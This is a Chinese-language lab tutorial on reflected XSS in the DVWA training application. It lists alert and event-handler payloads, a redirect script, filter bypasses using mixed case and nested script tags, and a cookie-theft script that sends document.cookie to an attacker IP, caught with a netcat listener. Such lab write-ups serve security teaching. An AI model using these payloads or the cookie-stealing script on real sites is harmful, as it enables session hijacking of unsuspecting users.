DVWA之XSS跨站脚本攻击(反射型)

DVWA之XSS跨站脚本攻击(反射型)

环境及原理

环境: kali linux 、dvwa 、攻击机(win10)、 被攻击机(win xp)

原理

1.弹窗
在这里插入图片描述
2.重定向
在这里插入图片描述3.获取cookie
在这里插入图片描述

低等级

一、弹窗

js恶意代码:

# 直接嵌入
<script>alert('xss')</script>
# 元素事件
<body onload = alert('xss')>

<img src = '' onerror = alert('xss')>

<a href = '' onclick = alert('xss')>type</a>

插入恶意代码
在这里插入图片描述
返回被插入恶意代码的页面
在这里插入图片描述
发送url给被攻击者,被攻击者打开页面,并触发XSS
在这里插入图片描述

二、重定向

js恶意代码:

<script>window.location = "http://www.baidu.com"</script>

返回js页面,并发送给被攻击者:
在这里插入图片描述
在这里插入图片描述被攻击者打开url:
在这里插入图片描述发生重定向
在这里插入图片描述

三、获取cookie

js恶意代码:

<script>alert(document.cookie)</script>

<script src='http://xxxxx/a.js'></script>

在kaili linux 的 /var/www/html/目录下创建a.js文件,内容为:

扫描二维码关注公众号,回复: 12781695 查看本文章
var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;

在这里插入图片描述插入恶意代码,返回页面,使用被攻击机访问url
在这里插入图片描述

打开kalil inux,使用 nc -vnlp 88 对88号端口进行监听
在这里插入图片描述
返回cookie
在这里插入图片描述

中等级

源码:对 < script > 标签进行了过滤。

在这里插入图片描述可以采用其他标签触法XSS;或者使用大小写混合进行绕过。

<sCriPt>alert('xss')</script>

双写绕过

<sc<script>ript>alert('xss')</script>

在这里插入图片描述
成功触法:
在这里插入图片描述

高等级

源码:对< script > 标签正则匹配过滤。
在这里插入图片描述
使用其他标签进行绕过:

<body onload = alert('xss')>

<img src = '' onerror = alert('xss')>

<a href = '' onclick = alert('xss')>type</a>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

DVWA之XSS跨站脚本攻击(DOM型).

DVWA之XSS跨站脚本攻击(存储型).

猜你喜欢

转载自blog.csdn.net/qq_45742511/article/details/113182178